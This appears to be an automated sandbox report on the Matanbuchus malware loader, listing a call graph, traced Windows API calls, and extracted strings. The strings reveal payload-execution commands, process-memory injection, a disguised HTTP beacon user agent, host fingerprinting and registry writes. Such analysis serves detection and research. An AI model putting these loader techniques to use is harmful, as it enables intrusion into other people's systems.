44944 7fa7a317 std::ios_base::_Ios_base_dtor 44944->44939 44945 7fa7ea50 44947 7fa7eb0d 44945->44947 44948 7fa7ea88 swprintf 44945->44948 44947->44622 45151 7fabd78c 44 API calls 44948->45151 44951 7fa7eff8 swprintf 44949->44951 44952 7fa7f07d 44949->44952 45152 7fabd78c 44 API calls 44951->45152 44952->44624 44955 7fa7bb71 44953->44955 44956 7fa7baec swprintf 44953->44956 44955->44626 45153 7fabd78c 44 API calls 44956->45153 44958 7fa7fbd9 44957->44958 44960 7fa7fb54 swprintf 44957->44960 44958->44628 45154 7fabd78c 44 API calls 44960->45154 44962 7fa83769 44961->44962 44964 7fa836e4 swprintf 44961->44964 44962->44630 45155 7fabd78c 44 API calls 44964->45155 44966 7fa80e85 44965->44966 44967 7fa80e00 swprintf 44965->44967 44966->44632 45156 7fabd78c 44 API calls 44967->45156 44970 7fa7d311 44969->44970 44972 7fa7d28c swprintf 44969->44972 44970->44634 45157 7fabd78c 44 API calls 44972->45157 44974 7fa808c9 44973->44974 44975 7fa80844 swprintf 44973->44975 44974->44636 45158 7fabd78c 44 API calls 44975->45158 44978 7fa7efa1 44977->44978 44980 7fa7ef1c swprintf 44977->44980 44978->44640 45159 7fabd78c 44 API calls 44980->45159 44982 7fa7d481 44981->44982 44984 7fa7d3fc swprintf 44981->44984 44982->44646 45160 7fabd78c 44 API calls 44984->45160 44986 7fa63ede 44985->44986 44987 7fa78d50 42 API calls 44986->44987 44992 7fa63fef 44987->44992 44988 7fa93640 std::ios_base::clear 42 API calls 44989 7fa6430f 44988->44989 44990 7fa79ef0 42 API calls 44989->44990 44991 7fa6432a 44990->44991 44993 7fa63e20 44991->44993 44992->44988 44994 7fa63e44 44993->44994 45161 7fa693d0 44994->45161 44998 7fa7fd81 44997->44998 45000 7fa7fcfc swprintf 44997->45000 44998->44656 45169 7fabd78c 44 API calls 45000->45169 45002 7fa7d7f1 45001->45002 45004 7fa7d76c swprintf 45001->45004 45002->44662 45170 7fabd78c 44 API calls 45004->45170 45006 7fa83941 45005->45006 45008 7fa838bc swprintf 45005->45008 45006->44670 45171 7fabd78c 44 API calls 45008->45171 45010 7fa7cd91 45009->45010 45012 
7fa7cd0c swprintf 45009->45012 45010->44678 45172 7fabd78c 44 API calls 45012->45172 45014 7fa7e891 45013->45014 45016 7fa7e80c swprintf 45013->45016 45014->44684 45173 7fabd78c 44 API calls 45016->45173 45019 7fa7c271 45017->45019 45020 7fa7c1ec swprintf 45017->45020 45019->44686 45174 7fabd78c 44 API calls 45020->45174 45022 7faba454 45021->45022 45023 7faba47d std::ios_base::clear 45022->45023 45024 7fa92510 42 API calls 45022->45024 45025 7fa91370 std::ios_base::clear 41 API calls 45023->45025 45024->45023 45026 7fab21ad GetPEB 45025->45026 45026->44697 45027->44707 45028->44728 45029->44722 45030->44728 45031->44741 45032->44728 45033->44767 45034->44728 45035->44745 45036->44800 45037->44728 45038->44772 45039->44793 45040->44728 45041->44799 45042->44728 45046 7fa75e2b 45043->45046 45052 7fa75f00 45046->45052 45049 7fa772f0 45134 7fa764d0 45049->45134 45051 7fa77301 45051->44936 45053 7fa75f2b 45052->45053 45060 7faacda0 45053->45060 45056 7fa763e0 45057 7fa7640b 45056->45057 45059 7fa75eab 45057->45059 45133 7fabcf0d 9 API calls 2 library calls 45057->45133 45059->45049 45069 7fa8f690 45060->45069 45064 7faace13 45065 7fa75e93 45064->45065 45088 7fabcf0d 9 API calls 2 library calls 45064->45088 45065->45056 45066 7faacdce 45066->45064 45080 7fa93640 45066->45080 45070 7fa93640 std::ios_base::clear 42 API calls 45069->45070 45071 7fa8f712 45070->45071 45072 7fabd43b std::_Facet_Register 3 API calls 45071->45072 45073 7fa8f719 45072->45073 45074 7fa8f733 45073->45074 45089 7fabca04 46 API calls 6 library calls 45073->45089 45076 7fababf0 45074->45076 45077 7fabac2d 45076->45077 45090 7fa75960 45077->45090 45079 7fabac49 std::ios_base::_Ios_base_dtor 45079->45066 45081 7fa93669 45080->45081 45082 7fa936cc 45080->45082 45084 7fa9367a std::ios_base::clear 45081->45084 45130 7fabe725 RaiseException 45081->45130 45082->45064 45131 7fa786a0 42 API calls 2 library calls 45084->45131 45086 7fa936be 45132 7fabe725 RaiseException 45086->45132 45088->45065 45089->45074 
45104 7fabc5ec 45090->45104 45094 7fa759a5 45103 7fa759c7 45094->45103 45123 7fa8ee20 71 API calls 2 library calls 45094->45123 45096 7fa75a80 45096->45079 45098 7fa759df 45099 7fa759e7 45098->45099 45100 7fa759ee 45098->45100 45124 7fa90d10 RaiseException Concurrency::cancel_current_task 45099->45124 45125 7fabc9d2 RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 45100->45125 45116 7fabc644 45103->45116 45105 7fabc5fb 45104->45105 45106 7fabc602 45104->45106 45126 7facc0ff 6 API calls std::_Lockit::_Lockit 45105->45126 45108 7fa7598c 45106->45108 45127 7fabd070 EnterCriticalSection 45106->45127 45110 7fa7ad10 45108->45110 45111 7fa7ad55 45110->45111 45112 7fa7ad21 45110->45112 45111->45094 45113 7fabc5ec std::_Lockit::_Lockit 7 API calls 45112->45113 45114 7fa7ad2b 45113->45114 45115 7fabc644 std::_Lockit::~_Lockit 2 API calls 45114->45115 45115->45111 45117 7facc10d 45116->45117 45118 7fabc64e 45116->45118 45129 7facc0e8 LeaveCriticalSection 45117->45129 45119 7fabc661 45118->45119 45128 7fabd07e LeaveCriticalSection 45118->45128 45119->45096 45122 7facc114 45122->45096 45123->45098 45124->45103 45125->45103 45126->45108 45127->45108 45128->45119 45129->45122 45130->45084 45131->45086 45132->45082 45133->45059 45135 7fabd43b std::_Facet_Register 3 API calls 45134->45135 45136 7fa76576 45135->45136 45138 7fa76590 45136->45138 45139 7fabca04 46 API calls 6 library calls 45136->45139 45138->45051 45139->45138 45141 7fa78d9b 45140->45141 45143 7fa78dea 45141->45143 45149 7faa6c20 42 API calls std::ios_base::clear 45141->45149 45143->44944 45148 7fa75aa0 71 API calls 5 library calls 45143->45148 45145 7fa79f13 45144->45145 45146 7fa79f3c 45145->45146 45150 7fa90960 42 API calls std::ios_base::clear 45145->45150 45146->44945 45148->44944 45149->45143 45150->45146 45151->44947 45152->44952 45153->44955 45154->44958 45155->44962 45156->44966 45157->44970 45158->44974 45159->44978 45160->44982 45162 7fa69428 45161->45162 45163 7fa78d50 42 API 
calls 45162->45163 45165 7fa694a8 45163->45165 45164 7fa93640 std::ios_base::clear 42 API calls 45166 7fa6978b 45164->45166 45165->45164 45167 7fa79ef0 42 API calls 45166->45167 45168 7fa63e8d 45167->45168 45168->44651 45169->44998 45170->45002 45171->45006 45172->45010 45173->45014 45174->45019 45176 7fa6d393 45175->45176 45177 7fa76a80 numpunct 42 API calls 45176->45177 45178 7fa6d436 45176->45178 45179 7fa6d3c6 45177->45179 45191 7fa7a170 45178->45191 45195 7fa64940 42 API calls std::ios_base::clear 45179->45195 45183 7fa6d3e8 45196 7fa94010 42 API calls 2 library calls 45183->45196 45185 7fa6d40a 45197 7fabe725 RaiseException 45185->45197 45187 7fa6d41b 45188 7fa91370 std::ios_base::clear 41 API calls 45187->45188 45189 7fa6d427 45188->45189 45190 7fa91370 std::ios_base::clear 41 API calls 45189->45190 45190->45178 45192 7fa6d486 45191->45192 45193 7fa7a18c 45191->45193 45192->44808 45194 7fa92510 42 API calls 45193->45194 45194->45192 45195->45183 45196->45185 45197->45187 45200 7faafae3 45198->45200 45199 7fa91370 std::ios_base::clear 41 API calls 45201 7fa941c1 45199->45201 45200->45199 45201->44816 45203 7fab557b 45202->45203 45204 7fa76a80 numpunct 42 API calls 45203->45204 45205 7fab569e 45204->45205 45206 7fa91370 std::ios_base::clear 41 API calls 45205->45206 45207 7fa941e2 45206->45207 45207->44820 45213 7fa6bad0 45208->45213 45211 7fa92480 Concurrency::cancellation_token_source::~cancellation_token_source 83 API calls 45212 7fa631a4 45211->45212 45212->44827 45222 7fa91eb0 45213->45222 45216 7fa76a80 numpunct 42 API calls 45218 7fa6bb56 45216->45218 45217 7fa6bb7f 45231 7fa798d0 45217->45231 45218->45217 45235 7facbfcd 83 API calls Concurrency::cancellation_token_source::~cancellation_token_source 45218->45235 45221 7fa6bbba 45221->45211 45223 7fa91eca 45222->45223 45224 7fa91ecf 45222->45224 45236 7fa90cf0 RaiseException Concurrency::cancel_current_task 45223->45236 45226 7fa91edf 45224->45226 45227 7fa91ef0 45224->45227 45237 7fa64b60 42 API calls 3 
library calls 45226->45237 45228 7fa6bafc 45227->45228 45230 7fabd43b std::_Facet_Register 3 API calls 45227->45230 45228->45216 45230->45228 45232 7fa798f7 45231->45232 45233 7fa7993c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 45231->45233 45232->45233 45238 7fa8d9b0 41 API calls Concurrency::cancellation_token_source::~cancellation_token_source 45232->45238 45233->45221 45235->45217 45236->45224 45237->45228 45238->45233

                          Control-flow Graph

                          [Control-flow graph; first listed block 7fa8963f-7fa89657; legend: Executed / Not Executed]
                          APIs
                            • Part of subcall function 7FA95EA0: std::exception::exception.LIBCMTD ref: 7FA95ED0
                          • Sleep.KERNEL32(?), ref: 7FA8C479
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleepstd::exception::exception
                          • String ID: 7$Dll launch(Regsvr32)$Dll launch(RunDll32)$ExecuteDllRemoteProcessMemory$ExecuteRemoteProcessMemory$Install MSI Package$Launch command CMD$Launch command PS$Launch console exe$Launch exe$Launch with privileges$Loader bin shellCode$Loader bin shellCode #2$PeLoader Dll & EXE$PeLoader Dll Start$PeLoader Dll dllregisterserver$TPd$VQmR$cKC$paU${$!#
                          • API String ID: 2541862923-4091641541
                          APIs
                            • Part of subcall function 7FA63EA0: std::ios_base::clear.LIBCPMTD ref: 7FA6430A
                          • HttpSendRequestA.WININET(?,?,?,?,?,User-Agent: Microsoft-WNS/10.0Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CA,?,?), ref: 7FAB38CB
                          • InternetReadFile.WININET(?,?,?,?), ref: 7FAB439F
                          • InternetCloseHandle.WININET(?), ref: 7FAB4E72
                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 7FAB54BB
                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 7FAB5507
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InternetIos_base_dtorstd::ios_base::_$CloseFileHandleHttpReadRequestSendstd::ios_base::clear
                          • String ID: $Microsoft-WNS/10.0$POST$User-Agent: Microsoft-WNS/10.0Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CA$}>
                          • API String ID: 1857752463-2552320425

                          APIs
                          • CoInitializeSecurity.COMBASE(00000000,00000000), ref: 7FAAD05A
                          • CoSetProxyBlanket.COMBASE(00000000,00000000,00000003,00000003,00000000,00000000), ref: 7FAAD740
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: BlanketInitializeProxySecurity
                          • String ID: #$$$8$n${
                          • API String ID: 257369873-1307703517

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$GlobalMemoryStatus
                          • String ID: @
                          • API String ID: 2185283323-2766056989

                          APIs
                          • GetComputerNameExA.KERNEL32(?,?,?), ref: 7FAABE63
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ComputerName
                          • String ID: WORKGROUP
                          • API String ID: 3545744682-2380569353

                          APIs
                            • Part of subcall function 7FA93490: __aullrem.LIBCMT ref: 7FA934E5
                            • Part of subcall function 7FA87920: CreateMutexA.KERNEL32(00000000,00000001,7FABB249,?,?,7FABB249,?), ref: 7FA8792C
                          • ExitProcess.KERNEL32 ref: 7FABB252
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateExitMutexProcess__aullrem
                          • String ID:
                          • API String ID: 1029110445-0

                          APIs
                          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 7FAA8AB7
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AdaptersInfo
                          • String ID:
                          • API String ID: 3177971545-0

                          APIs
                          • PathIsDirectoryW.SHLWAPI(?), ref: 7FA9346D
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectoryPath
                          • String ID:
                          • API String ID: 1580926078-0
                          APIs
                          • GetSystemInfo.KERNEL32(?), ref: 7FAA8547
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoSystem
                          • String ID:
                          • API String ID: 31276548-0

                          APIs
                          • __RTC_Initialize.LIBCMT ref: 7FABDBA6
                          • ___scrt_uninitialize_crt.LIBCMT ref: 7FABDBC0
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Initialize___scrt_uninitialize_crt
                          • String ID:
                          • API String ID: 2442719207-0

                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: dllmain_raw$dllmain_crt_dispatch
                          • String ID:
                          • API String ID: 3136044242-0

                          APIs
                          • CreateMutexA.KERNEL32(00000000,00000001,7FABB249,?,?,7FABB249,?), ref: 7FA8792C
                          • GetLastError.KERNEL32(?,?,7FABB249), ref: 7FA8793F
                          • CloseHandle.KERNEL32(00000000,?,?,7FABB249), ref: 7FA87950
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateErrorHandleLastMutex
                          • String ID:
                          • API String ID: 4294037311-0

                          APIs
                          • __RTC_Initialize.LIBCMT ref: 7FABDAA5
                            • Part of subcall function 7FABE22C: InitializeSListHead.KERNEL32(7FAFB228,7FABDAAF,7FAF25C0,00000010,7FABDA40,?,?,?,7FABDC68,?,00000001,?,?,00000001,?,7FAF2608), ref: 7FABE231
                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 7FABDB0F
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                          • String ID:
                          • API String ID: 3231365870-0
                          • Opcode ID: 8a23eaf5a25b37a4e4d00f917c8cd1ac19ac8fd7a43b50c191968759d279ecd5
                          • Instruction ID: 92bafe16d8be914b2e87c87c2ff058c917d3a8894e593ba9039bd391c4959259
                          • Opcode Fuzzy Hash: 8a23eaf5a25b37a4e4d00f917c8cd1ac19ac8fd7a43b50c191968759d279ecd5
                          • Instruction Fuzzy Hash: 03216A36A483468ADB00ABB4D505BCC3BFDEF29329F14020DC896AF1D9DB2D6045C657

                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 7FAD1929
                          • GetFileType.KERNEL32(00000000), ref: 7FAD193B
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileHandleType
                          • String ID:
                          • API String ID: 3000768030-0
                          • Opcode ID: be8c7a8a7c8d3ac941d21ac9be315d21dc60af83829a5e124ea3c9041e6ca954
                          • Instruction ID: fb205b2343056295dc4112f8e12ad6bab9e9c4d71287a5ba2ff9151942e0690c
                          • Opcode Fuzzy Hash: be8c7a8a7c8d3ac941d21ac9be315d21dc60af83829a5e124ea3c9041e6ca954
                          • Instruction Fuzzy Hash: 1811967E2087414AE721493E8C84652BAEAAB9A17CF340719F4B7961FDC23CE496C251
                          APIs
                          • GetLocaleInfoW.KERNEL32(?,2000000B,7FAD7A08,00000002,00000000,?,?,?,7FAD7A08,?,00000000), ref: 7FAD7783
                          • GetLocaleInfoW.KERNEL32(?,20001004,7FAD7A08,00000002,00000000,?,?,?,7FAD7A08,?,00000000), ref: 7FAD77AC
                          • GetACP.KERNEL32(?,?,7FAD7A08,?,00000000), ref: 7FAD77C1
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID: ACP$OCP
                          • API String ID: 2299586839-711371036
                          • Opcode ID: e757ca8196d3514d73f6f690ed78689016915f157deb3966c886cc2c3f6b2954
                          • Instruction ID: 6b908deefab26fff2f096a2c927911834253369cafb24d7815ea8a40110bb072
                          • Opcode Fuzzy Hash: e757ca8196d3514d73f6f690ed78689016915f157deb3966c886cc2c3f6b2954
                          • Instruction Fuzzy Hash: F921A93A6213019AD71A8F34C905BC77377AB48A64B528D24FD07DB11CFB35E941C390
                          APIs
                            • Part of subcall function 7FACEB5C: GetLastError.KERNEL32(?,00000008,7FAD360A), ref: 7FACEB60
                            • Part of subcall function 7FACEB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7FACEC02
                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 7FAD79CB
                          • IsValidCodePage.KERNEL32(00000000), ref: 7FAD7A14
                          • IsValidLocale.KERNEL32(?,00000001), ref: 7FAD7A23
                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 7FAD7A6B
                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 7FAD7A8A
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                          • String ID:
                          • API String ID: 415426439-0
                          • Opcode ID: 0347432c804dd9a9c58a9af6ce747468f1d43c146f493357b787b24c89a8d1ee
                          • Instruction ID: 641cde69cebf474d06baa9c6cbf297db143020e8e31351d14af47ecd8544c253
                          • Opcode Fuzzy Hash: 0347432c804dd9a9c58a9af6ce747468f1d43c146f493357b787b24c89a8d1ee
                          • Instruction Fuzzy Hash: C5517F7AA10306ABDB44DFA5CD41BEE77B8EF08704F104129F956E715CE778AA408B61
                          APIs
                            • Part of subcall function 7FACEB5C: GetLastError.KERNEL32(?,00000008,7FAD360A), ref: 7FACEB60
                            • Part of subcall function 7FACEB5C: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7FACEC02
                          • GetACP.KERNEL32(?,?,?,?,?,?,7FACF5A2,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7FAD701C
                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7FACF5A2,?,?,?,00000055,?,-00000050,?,?), ref: 7FAD7047
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7FAD71AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$CodeInfoLocalePageValid
                          • String ID: utf8
                          • API String ID: 607553120-905460609
                          • Opcode ID: a1bbc3af38a4caf28fefb908b510b7f8a2ea2dde323c7f10d655de47240371aa
                          • Instruction ID: 15bc2633e30f7395911eb9aedb355f8601ef4a20eb66ec48bf66428011461c08
                          • Opcode Fuzzy Hash: a1bbc3af38a4caf28fefb908b510b7f8a2ea2dde323c7f10d655de47240371aa
                          • Instruction Fuzzy Hash: AE71F775610706AAEB199B74CD41BAA73BDEF08714F104169F907DB1ACEB7CF94087A0
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _strrchr
                          • String ID:
                          • API String ID: 3213747228-0
                          • Opcode ID: 44ed88f6ba2c6c923b7e4f7c1f4b16af1dbdd87646cd4620f9ac410d0ade0b1b
                          • Instruction ID: fd645fdd7d945d7481bc249b08dce2c12a626efb72745663a8791f2e8792ada9
                          • Opcode Fuzzy Hash: 44ed88f6ba2c6c923b7e4f7c1f4b16af1dbdd87646cd4620f9ac410d0ade0b1b
                          • Instruction Fuzzy Hash: 24B117729053459FEB028F78C8917EEBBB5EF49360F14426AF845AB24DD63C9901C7A0
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7FABE083
                          • IsDebuggerPresent.KERNEL32 ref: 7FABE14F
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7FABE168
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 7FABE172
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                          • String ID:
                          • API String ID: 254469556-0
                          • Opcode ID: 781ec4c590d6b6eaddc842b21f9d8639d3920f36abf0af0e00e6da6945df8e46
                          • Instruction ID: 1782b17edab2f9afab0106d7e78eb71bdc6ed2e3478780690637c74f9a982256
                          • Opcode Fuzzy Hash: 781ec4c590d6b6eaddc842b21f9d8639d3920f36abf0af0e00e6da6945df8e46
                          • Instruction Fuzzy Hash: 89312A79C053189BDB10DFA5D989BCDBBB8FF18300F1041AAE40DAB250E7799A85CF45
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7FACB9C4
                          • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,?), ref: 7FACB9E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Module$FileHandleName
                          • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                          • API String ID: 4146042529-3261600717
                          • Opcode ID: 5384f731f13a9612d74b0f6482b0e4f5aa06ef8276a2cc8ab4827f5768e3a3e6
                          • Instruction ID: e9beafe23d5c021c845a3a1197f42b569fc015d53481f5d7bd12803dbc44cd3b
                          • Opcode Fuzzy Hash: 5384f731f13a9612d74b0f6482b0e4f5aa06ef8276a2cc8ab4827f5768e3a3e6
                          • Instruction Fuzzy Hash: 87C1F431A0030AA7C7165B29CD49F9B77B9FF58340F440568FC069A21DFB3EEA41C6A1
                          APIs
                          Strings
                          • n_chars < number_buffer.size() - 1, xrefs: 7FA6C6D9
                          • d, xrefs: 7FA6C590
                          • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7FA6C52E, 7FA6C6D4
                          • d, xrefs: 7FA6C64C
                          • @, xrefs: 7FA6C6BD
                          • d, xrefs: 7FA6C6F5
                          • x < 0 and x < (std::numeric_limits<number_integer_t>::max)(), xrefs: 7FA6C533
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aullrem
                          • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$n_chars < number_buffer.size() - 1$x < 0 and x < (std::numeric_limits<number_integer_t>::max)()
                          • API String ID: 3758378126-3644039597
                          • Opcode ID: 1a4b29f88f88b80b0df76aadaf274120d6ff4e2b253de5a1247ba789386d628f
                          • Instruction ID: d563f914ca1d39ba13da7f281826165c8c752c9af9edbb5392ae3dbae8eaafc4
                          • Opcode Fuzzy Hash: 1a4b29f88f88b80b0df76aadaf274120d6ff4e2b253de5a1247ba789386d628f
                          • Instruction Fuzzy Hash: 28F1E278D01219DFDB15CF99C980B9DBBB2FF48305F1081AAD81AAB358D7386A84CF54
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FA60000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_7fa60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv__aullrem
                          • String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
                          • API String ID: 3839614884-178659603
                          • Opcode ID: 4b09179324c7a7427233782c449c7d0554c057118df2d7e01900f081ae23256a
                          • Instruction ID: e972c6f0c72d18b27ad956e5d9d8343029c65b792434ce92a2115aef27939466
                          • Opcode Fuzzy Hash: 4b09179324c7a7427233782c449c7d0554c057118df2d7e01900f081ae23256a
                          • Instruction Fuzzy Hash: 11E1E078E01219DFDB14CF99D981B9DBBB2FF48305F2081AAD519A7358D7386A80CF54
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,00000000,00000044,00000000), ref: 7FABBB99
                          • wsprintfW.USER32 ref: 7FABBBE6
                          • RegCreateKeyExW.ADVAPI32(00000000,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7FABBC03
                          • RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,?), ref: 7FABBC24
                          • RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7FABBC44
                          • RegCloseKey.ADVAPI32(00000000), ref: 7FABBC5D
                          • RegCloseKey.ADVAPI32(00000000), ref: 7FABBC68
                            • Part of subcall function 7FABC347: GetTickCount.KERNEL32 ref: 7FABC365
                          Strings
                          Memory Dump Source
